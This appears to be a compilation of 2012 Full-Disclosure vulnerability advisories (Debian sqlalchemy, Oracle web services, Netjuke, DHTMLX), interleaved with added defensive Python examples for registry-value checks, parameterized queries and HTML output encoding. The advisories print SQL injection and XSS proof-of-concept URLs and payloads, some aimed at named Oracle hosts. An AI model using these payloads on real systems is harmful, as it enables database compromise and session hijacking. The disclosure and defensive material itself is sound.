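The advisory's trigger is a user-writable registry value (Recent1, Recent2, ...) that the affected executables copy into a fixed buffer when the File menu is opened. The following Python script is an added detection example, not part of the advisory or of Crystal Office: it parses an exported .reg file offline and reports any Recent* value under the Crystal Office key whose decoded length exceeds a threshold. The 260-character threshold (MAX_PATH), the watched key prefix and the sample export are assumptions; the advisory does not state the size of the overflowed buffer.

```python
"""Offline check for oversized Recent* values in a registry export.

Added detection example; not part of the advisory. The advisory states that an
oversized string in the Recent1, Recent2, ... values below
HKEY_CURRENT_USER\\Software\\Crystal Office\\<app> overflows a buffer when the
File menu is opened. This helper parses a .reg export (as written by
"reg.exe export" or regedit) and reports any Recent* value whose decoded length
exceeds a threshold. The 260-character threshold (MAX_PATH) is an assumption;
the advisory does not give the size of the overflowed buffer.
"""
import re

# Hypothetical: key prefix to watch, written with the backslashes a .reg file uses.
WATCHED_KEY_PREFIX = "HKEY_CURRENT_USER\\Software\\Crystal Office\\"
MAX_PATH = 260  # assumed upper bound for a legitimate recent-file path

# A REG_SZ line in a .reg export looks like:  "Recent1"="C:\\Users\\alice\\doc.txt"
_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')


def _unescape_reg_string(s):
    """Undo .reg string escaping: a backslash escapes the following character."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg_export(text):
    """Return {key_path: {value_name: decoded_string}} for REG_SZ values."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group("name")] = _unescape_reg_string(m.group("data"))
    return keys


def find_oversized_recent_values(text, limit=MAX_PATH):
    """List (key, value_name, length) for Recent* values longer than limit
    under the watched key prefix; values under other keys are ignored."""
    findings = []
    for key, values in parse_reg_export(text).items():
        if not key.startswith(WATCHED_KEY_PREFIX):
            continue
        for name, data in values.items():
            if name.lower().startswith("recent") and len(data) > limit:
                findings.append((key, name, len(data)))
    return findings


# Constructed sample export: one normal path and one 3000-character Recent2 value.
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\n"
    "\n"
    "[HKEY_CURRENT_USER\\Software\\Crystal Office\\NotePro]\n"
    '"Recent1"="C:\\\\Users\\\\alice\\\\Documents\\\\report.rtf"\n'
    '"Recent2"="' + "A" * 3000 + '"\n'
    "\n"
    "[HKEY_CURRENT_USER\\Software\\Other Vendor\\App]\n"
    '"Recent1"="' + "B" * 3000 + '"\n'
)

if __name__ == "__main__":
    for key, name, length in find_oversized_recent_values(SAMPLE_REG):
        print(f"{key}\\{name}: {length} characters (limit {MAX_PATH})")
```

On a live system the same check can be fed the output of `reg export "HKCU\Software\Crystal Office" out.reg`; the value under the unrelated key in the sample is deliberately ignored so that the report stays limited to the keys the advisory names.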
[Full-disclosure] [SECURITY] [DSA 2449-1] sqlalchemy security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2449-1                   secur...@debian.org
http://www.debian.org/security/                               Nico Golde
April 12, 2012                         http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : sqlalchemy
Vulnerability  : missing input sanitization
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-0805

It was discovered that sqlalchemy, an SQL toolkit and object relational mapper for Python, is not sanitizing input passed to the limit/offset keywords of select() as well as the value passed to select.limit()/offset(). This allows an attacker to perform SQL injection attacks against applications using sqlalchemy that do not implement their own filtering.

For the stable distribution (squeeze), this problem has been fixed in version 0.6.3-3+squeeze1.

For the testing distribution (wheezy), this problem has been fixed in version 0.6.7-1.

For the unstable distribution (sid), this problem has been fixed in version 0.6.7-1.

We recommend that you upgrade your sqlalchemy packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk+GZWIACgkQHYflSXNkfP+xvQCgocwOsYzLI+eh2slV+ma/k3HX
hO8An0+oka75m0dk3tI9IRzatJ2/J2T0
=4efD
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CRUNCH TV SHOW - Live Stream & Security Videos
Title:
======
CRUNCH TV SHOW - Live Stream & Security Videos

Date:
=====
2012-04-11

References:
===========
Download: http://www.vulnerability-lab.com/resources/videos/508.mov
View: http://www.youtube.com/watch?v=G9ECcxvB0dQ

VL-ID:
=====
508

Status:
=======
Published

Exploitation-Technique:
=======================
TV Show

Severity:
=========
Critical

Details:
========
This is the new trailer for the new Crunch TV Security Show, starting in May 2012. The first moderator of the security TV show is the well-known John Thomas Draper alias Captain Crunch. Co-moderator & researcher of the show is the well-known exploiter Benjamin Kunz Mejri from Germany.

Credits:
========
John Thomas Draper (born 1943), also known as Captain Crunch, Crunch or Crunchman (after Cap'n Crunch, the mascot of a breakfast cereal), is an American computer programmer and former phone phreak. He is a legendary figure within the computer programming world.

Draper is the son of a U.S. Air Force engineer; he described his father as distant in an interview published on the front page of the Jan 13–14, 2007 issue of The Wall Street Journal. Draper himself entered the Air Force in 1964, and while stationed in Alaska helped his fellow servicemen make free phone calls home by devising access to a local telephone switchboard. After Alaska, he was stationed at Charleston Air Force Station in Maine. In 1967, he created WKOS [W-"chaos"], a pirate station in nearby Dover-Foxcroft, but had to shut it down when a legitimate radio station, WDME, objected. He was honorably discharged from the Air Force in 1968 and did military-related work for several employers in the San Francisco Bay Area. He adopted the counterculture of the times and operated a pirate radio station out of a Volkswagen van.

One oft-repeated story featuring Captain Crunch goes as follows: Draper picked up a public phone, then proceeded to "phreak" his call around the world. At no charge, he routed a call through different phone switches in countries such as Japan, Russia and England. Once he had set the call to go through dozens of countries, he dialed the number of the public phone next to him. A few minutes later, the phone next to him rang. Draper spoke into the first phone, and, after quite a few seconds, he heard his own voice very faintly on the other phone. He sometimes repeated this stunt at parties.

Draper also claimed that he and a friend once placed a direct call to the White House during the Nixon administration, and after giving the operator President Nixon's secret code name of "Olympus", and asking to speak to the president about a national emergency, they were connected with someone who sounded like Richard Nixon; Draper's friend told the man about a toilet paper shortage in Los Angeles, at which point the person on the other end of the line angrily asked them how they'd managed to get connected to him. Draper was also a member of the Homebrew Computer Club.

&&

Benjamin Kunz M. (28) is active as a penetration tester and security analyst for private and public security firms, hosting entities, banks, ISPs (telecom) and IPS. His specialties are security checks (penetration tests) on services, software, applications, malware analysis, underground economy, government protection or cyberwar analysis, reverse engineering, lectures or presentations and workshops about IT Security. During his work as a penetration tester and vulnerability researcher, many open- or closed-source applications, software and services were made more secure. In 1997, Benjamin K.M. founded a non-commercial and independent security research group called Global Evolution - Security Research Group, which is still active today. From 2010 to 2011, Benjamin M. and Pim C. (Research Team) identified over 300 zero-day vulnerabilities in well-known products from companies such as DELL, Barracuda, Mozilla, Kaspersky, McAfee, Google, Fortigate, Opera, Cyberoam, Safari, Endian, Skype, Asterisk, Astaro, PBX & SonicWall. In 2010 he founded the company Evolution Security. After the firm's establishment arose the Vulnerability Lab as the legal European initiative for vulnerability researchers, analysts, penetration testers, and serious hacker groups. Ben is also the leader of the Contest + VLab Research Team. He has a lot of stable references from solved events, interviews or contests/wargames like ePost SecCup, SCS2, 27c3, EH2008, Har2009, Da-op3n & he provides exclusive zero-day exploitation sessions/releases.

Disclaimer:
===========
The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss
[Full-disclosure] Oracle Service Applications - SQL Injection Vulnerabilities
Title:
======
Oracle Service Applications - SQL Injection Vulnerabilities

Date:
=====
2012-04-12

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=478

VL-ID:
=====
478

Introduction:
=============
Oracle Corporation (NASDAQ: ORCL) is an American multinational computer technology corporation that specializes in developing and marketing computer hardware systems and enterprise software products – particularly database management systems. Headquartered at 500 Oracle Parkway, Redwood Shores, Redwood City, California, United States and employing approximately 111,298 people worldwide as of 30 November 2011, it has enlarged its share of the software market through organic growth and through a number of high-profile acquisitions. By 2007 Oracle had the third-largest software revenue, after Microsoft and IBM. The company also builds tools for database development and systems of middle-tier software, enterprise resource planning software (ERP), customer relationship management software (CRM) and supply chain management (SCM) software. Larry Ellison, a co-founder of Oracle Corporation, has served as Oracle's CEO throughout its history. He also served as the Chairman of the Board until his replacement by Jeffrey O. Henley in 2004. On August 22, 2008 the Associated Press ranked Ellison as the top-paid chief executive in the world.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Oracle_Corporation )

Abstract:
=========
A Vulnerability Laboratory Researcher discovered multiple blind SQL Injection Vulnerabilities on Oracle's official service application.

Report-Timeline:
================
2012-03-28: Vendor Notification
2012-03-29: Vendor Response/Feedback
2012-04-11: Vendor Fix/Patch
2012-04-12: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
Multiple remote SQL Injection vulnerabilities are detected on Oracle's official service application (Web-Servers). The vulnerability allows an attacker (remote) to inject/execute own SQL commands on the affected application DBMS. Successful exploitation of the vulnerability results in DBMS, service & application compromise. The vulnerabilities are located in the shop, campus, education & academy services of Oracle.

Vulnerable Module(s):
[+] emea1-events-remove3
[+] cn-profile-oardc.jsp?flag=
[+] us-jobdesc.jsp
[+] cn-profile-add-oardc.jsp

Affected Service(s):
[+] https://campus.oracle.com
[+] http://education.oracle.com
[+] https://academy.oracle.com
[+] https://shop.oracle.com

Picture(s):
../1.png
../2.png
../3.png
../4.png

Proof of Concept:
=================
The SQL injection vulnerability can be exploited by remote attackers without user interaction. For demonstration or reproduce ...

https://campus.oracle.com/campus/HR/emea1-events-remove3.jsp?select1='+ (select convert(int,CHAR(95)+ CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

https://campus.oracle.com/campus/HR/us-jobdesc.jsp?select2='+ (select convert(int,CHAR(95)+ CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&Submit=Go

https://academy.oracle.com/pls/html/wwv_flow.show
post data
f01=false&f02=ASC&p_flow_id=300&p_flow_step_id=2&p_instance=3793763020344869&p_request=APXWGT&p_widget_action=COLUMN_ORDER&p_widget_mod=ACTION&p_widget_name=worksheet&x01=1%27%22&x02=9823900149811628

XSS
https://campus.oracle.com/campus/HR/cn-profile-direct.jsp?flag='"-->alert(/Vulnerable/)

A few SQL queries that can be seen in the source page:

SELECT class_id,doc_code,to_char(class_date,NVL(wc.date_format,'DD-MON- ')) dates, seats_avail, cl.city, cl.state, customer_sat_flag, deep_link_info, ed_center_id, cl.location_id, cl.location_code,loc_type, spoken_language, course_id, activity_version_id ,class_start_time,class_end_time, class_duration,oat.translation_attributes audiencetype_attributes, cl.timezone timezone, cl.parent_org_id, cl.territory_code FROM LQ_CLASS_SEARCH cl,OTA_AUDIENCE_TYPES oat, WDDI_COUNTRY wc ,MAP_URLS mu WHERE doc_code = ( SELECT easi_code FROM COURSES WHERE ID = 'D6
[Full-disclosure] Netjuke 1.0 RC1 - SQL Injection Vulnerabilities
Title:
======
Netjuke 1.0 RC1 - SQL Injection Vulnerabilities

Date:
=====
2012-04-12

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=506

VL-ID:
=====
506

Introduction:
=============
Netjuke is a Web-Based Audio Streaming Jukebox powered by PHP 4, a database and all the MP3, Ogg Vorbis and other format files that constitute your digital music collection. Supports images, language packs, multi-level security, random playlists ...

(Copy of the Vendor Website: http://sourceforge.net/projects/netjuke )

Abstract:
=========
A Vulnerability Laboratory Research Team discovered multiple SQL Injection Vulnerabilities in Netjuke v1.0 RC1.

Report-Timeline:
================
2012-04-12: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A remote SQL Injection vulnerability is detected in the Netjuke v1.0 RC1 Content Management System. The vulnerability allows an attacker (remote) or a local low-privileged user account to inject/execute own SQL commands on the affected application DBMS. Successful exploitation of the vulnerability results in DBMS & application compromise. The vulnerability is located in the search module of the web application.

Vulnerable Module(s):
[+] search.php

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers without user interaction. For demonstration or reproduce ...

PoC:
http://127.0.0.1/netjuke/search.php?do=list.tracks&col=[SQL-Injection]
http://127.0.0.1/netjuke/search.php?do=search.adv&clause=KCB1cHBlcih0ci5uYW1lKSBsaWtlICclPFNDUklQVD5BTEVSVCgxKTwvU0NSSVBUPiUnICk%3D&sort=al&filter=[SQL-Injection]
http://127.0.0.1/netjuke/search.php?do=search&col=ge.name&val=[SQL-Injection]
http://127.0.0.1/netjuke/search.php?do=list.tracks&col=ar_id&val=325&sort=al&filter=al_id=[SQL-Injection]

Risk:
=====
The security risk of the remote SQL injection vulnerabilities is estimated as high(+).

Credits:
========
Vulnerability Laboratory Researcher - snup (s...@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012 Vulnerability-Lab

--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: resea...@vulnerability-lab.com
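The DSA-2449-1 sqlalchemy notice, the Oracle advisory and the Netjuke advisory above describe the same defect from three angles: request parameters are spliced into SQL text. The Python example below is added here and is not code from Netjuke, Oracle or sqlalchemy. It builds a search query from the three kinds of input those posts involve: limit/offset (coerced to bounded integers), col/sort (identifiers, which cannot be bound, so they are checked against an allow-list) and val/select1 style data values (bound with placeholders). The schema, table aliases and sample rows are constructed for the demo and only loosely modelled on the ge.name, al_id and ar_id names in the Netjuke PoC URLs.

```python
"""Building a search query from untrusted request parameters.

Added example; not code from Netjuke, Oracle or sqlalchemy. The schema, aliases
and rows are constructed for the demo. SQLite is used so it runs offline; the
same three rules (integers coerced, identifiers allow-listed, values bound)
apply to any database driver.
"""
import sqlite3

# Allow-lists are the only safe way to take identifiers from a request:
# a column or sort key cannot be passed as a bound parameter.
ALLOWED_COLUMNS = {"tr.name", "al.name", "ar.name", "ge.name"}  # assumed names
ALLOWED_SORT = {"tr": "tr.name", "al": "al.name", "ar": "ar.name"}


def coerce_int(value, name, minimum, maximum):
    """Accept only a plain non-negative decimal integer within [minimum, maximum].

    "10 OR 1=1", "-1", "1; DROP TABLE x" and "" are all rejected, so nothing but
    a number ever reaches the LIMIT/OFFSET clause.
    """
    if isinstance(value, bool) or not isinstance(value, (int, str)):
        raise ValueError(f"{name} must be an integer")
    text = str(value).strip()
    if not (text.isascii() and text.isdigit()):
        raise ValueError(f"{name} must be a non-negative integer")
    number = int(text)
    if not minimum <= number <= maximum:
        raise ValueError(f"{name} out of range")
    return number


def _escape_like(val):
    """Escape LIKE wildcards so a search term is matched literally."""
    return val.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def build_search(col, val, sort, limit, offset):
    """Return (sql, params). Identifiers come from allow-lists, values are bound."""
    if col not in ALLOWED_COLUMNS:
        raise ValueError("unknown search column")
    if sort not in ALLOWED_SORT:
        raise ValueError("unknown sort key")
    lim = coerce_int(limit, "limit", 1, 500)
    off = coerce_int(offset, "offset", 0, 100_000)
    sql = (
        "SELECT tr.id, tr.name FROM tracks tr "
        "JOIN albums al ON al.id = tr.al_id "
        "JOIN artists ar ON ar.id = al.ar_id "
        "JOIN genres ge ON ge.id = tr.ge_id "
        f"WHERE {col} LIKE ? ESCAPE '\\' "
        f"ORDER BY {ALLOWED_SORT[sort]} LIMIT ? OFFSET ?"
    )
    return sql, ("%" + _escape_like(val) + "%", lim, off)


def make_demo_db():
    """In-memory SQLite database with a few constructed rows."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE artists(id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE albums(id INTEGER PRIMARY KEY, ar_id INTEGER, name TEXT);
        CREATE TABLE genres(id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE tracks(id INTEGER PRIMARY KEY, al_id INTEGER, ge_id INTEGER, name TEXT);
        INSERT INTO artists VALUES (1, 'Ada'), (2, 'Bob');
        INSERT INTO albums VALUES (1, 1, 'First'), (2, 2, 'Second');
        INSERT INTO genres VALUES (1, 'Rock'), (2, 'Jazz');
        INSERT INTO tracks VALUES (1, 1, 1, 'Intro'), (2, 1, 2, 'Blue'),
                                  (3, 2, 1, 'Loud'),  (4, 2, 2, 'Soft');
    """)
    return con


def search(con, col, val, sort, limit, offset):
    """Run the query and return the matching track names."""
    sql, params = build_search(col, val, sort, limit, offset)
    return [row[1] for row in con.execute(sql, params)]


if __name__ == "__main__":
    db = make_demo_db()
    print(search(db, "ge.name", "Rock", "tr", "10", "0"))
    print(search(db, "ge.name", "Rock' OR '1'='1", "tr", 10, 0))  # bound, so no match
    for bad in ("10 OR 1=1", "-1", "1; DROP TABLE tracks"):
        try:
            coerce_int(bad, "limit", 1, 500)
        except ValueError as err:
            print(f"rejected {bad!r}: {err}")
```

The quote-based payload in the second call is handled entirely by the driver's parameter binding, and the integer check is what an application had to supply itself for the sqlalchemy versions named in DSA-2449-1 before the fixed packages; the ESCAPE clause is a separate detail that keeps a user-supplied `%` from turning a search term into a wildcard.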
[Full-disclosure] DHTMLX Suite v.3.0 - Multiple Web Vulnerabilities
Title:
======
DHTMLX Suite v.3.0 - Multiple Web Vulnerabilities

Date:
=====
2012-04-11

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=507

VL-ID:
=====
507

Introduction:
=============
To demonstrate the rich possibilities of DHTMLX controls and to show how they work within a common user interface, we've created some demo applications which are listed below. Using dhtmlxLayout, dhtmlxGrid, dhtmlxTree, and other dhtmlx components, you can very quickly create your own web applications with similar user interfaces.

Ajax Application Built with DHTMLX - Database Administrator

Database Administrator
This application provides database management/navigation functionality and demonstrates simultaneous usage of the following DHTMLX components:
- dhtmlxLayout
- dhtmlxTree
- dhtmlxToolbar
- dhtmlxWindows
- dhtmlxGrid
- dhtmlxTabbar

(Copy of the Vendor Homepage: http://dhtmlx.com/docs/products/dhtmlxSuite/index.shtml )

Abstract:
=========
The Vulnerability Laboratory Team discovered multiple vulnerabilities in the DHTMLX v.3.0 Professional|Standard Edition.

Report-Timeline:
================
2012-04-10: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
1.1
A remote SQL Injection vulnerability is detected in the DHTMLX v.3.0 Professional|Standard Edition. The vulnerability allows an attacker (remote) or a local low-privileged user account to inject/execute own SQL commands on the affected application DBMS. Successful exploitation of the vulnerability results in DBMS & application compromise. The vulnerability is located in the SQL query module of the database administrator function, which allows injecting into the database tables via POST request.

Vulnerable Module(s):
[+] SQL Query - Command Module

--- SQL Exception Logs ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version from the right syntax to use near `1-` at line 1

Picture(s):
../1.png

1.2
Multiple persistent input validation vulnerabilities are detected in the DHTMLX v.3.0 Professional|Standard Edition. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction.

Vulnerable Module(s):
[+] Register Form - Input Fields & Login Username Display
[+] Contacts Us - Send Input Fields & Admin output Display
[+] Add Groups Name - Control Panel

Picture(s):
../2.png
../3.png

Proof of Concept:
=================
1.1
The SQL injection vulnerability can be exploited by local privileged users of the application DBMS. For demonstration or reproduce ...

id=host%5E0%7Cdb%5EdhtmlxKING-LUI%7Ctable%5Edepartments&sql=-1'%0A[SQL-INJECTION] [SQL-Query]

1.2
The persistent input validation vulnerabilities can be exploited by a local low-privileged user account with low required user interaction. For demonstration or reproduce ...

ADD URL: http://dhtmlx.com/docs/products/demoApps/dhtmlxDBAdmin/connection.html?etc=1333992780435

Vulnerable: Input Servername & Username - Listing

db2.dhtmlx.com ko >"http://google.com";>
Connection error http://www.vulnerability-lab.com";>

Risk:
=====
1.1
The security risk of the SQL injection vulnerability via POST is estimated as high(-).

1.2
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.
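The persistent issues in the DHTMLX advisory (register form username, contact form fields, group name shown in the control panel) and the reflected flag= parameter in the Oracle advisory share one root cause: a request value is written into HTML unchanged. The Python example below is added here and is not DHTMLX's or Oracle's code. It keeps the stored value raw and encodes it for the context it is rendered into: element text, a quoted attribute, or a URL attribute, which also needs a scheme check because encoding alone does not stop a javascript: link. The rendered field names and the sample payloads (taken from the PoC lines above) are demo assumptions.

```python
"""Encoding untrusted values on output.

Added example, not DHTMLX's or Oracle's code. The field names rendered here
are assumptions; the payload strings used in the demo are the ones quoted in
the advisories above.
"""
import html
from urllib.parse import urlsplit


def escape_text(value):
    """For element content: encoding < > & is enough; quotes cannot break out here."""
    return html.escape(value, quote=False)


def escape_attr(value):
    """For a quoted attribute value: also encode both quote characters."""
    return html.escape(value, quote=True)


def safe_href(url):
    """Allow only absolute http/https links; anything else collapses to '#'.

    html.escape alone would still let javascript:alert(1) through as a
    working link, so the scheme is checked before the value is encoded.
    """
    cleaned = url.strip()
    parts = urlsplit(cleaned)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return "#"
    return escape_attr(cleaned)


def render_profile(username, group_name, homepage):
    """Admin-side display of a stored profile; each value encoded for its context."""
    return (
        '<div class="profile">'
        f'<span class="user" title="{escape_attr(username)}">{escape_text(username)}</span>'
        f" in group <b>{escape_text(group_name)}</b>"
        f' <a href="{safe_href(homepage)}">homepage</a>'
        "</div>"
    )


def render_flag_param(flag):
    """Reflect a query parameter into the page body, as a flag= page would, but encoded."""
    return f"<p>flag: {escape_text(flag)}</p>"


if __name__ == "__main__":
    # Constructed inputs built from the payloads quoted in the advisories.
    print(render_profile("'\"-->alert(/Vulnerable/)", "admins", '>"http://google.com";>'))
    print(render_flag_param("<SCRIPT>ALERT(1)</SCRIPT>"))
    print(safe_href("javascript:alert(1)"))
```

Storing the raw value and encoding on every output path is what makes the fix hold for both the login display and the admin listing named in the DHTMLX advisory; encoding once at input time would have to guess every context the value will later be rendered into.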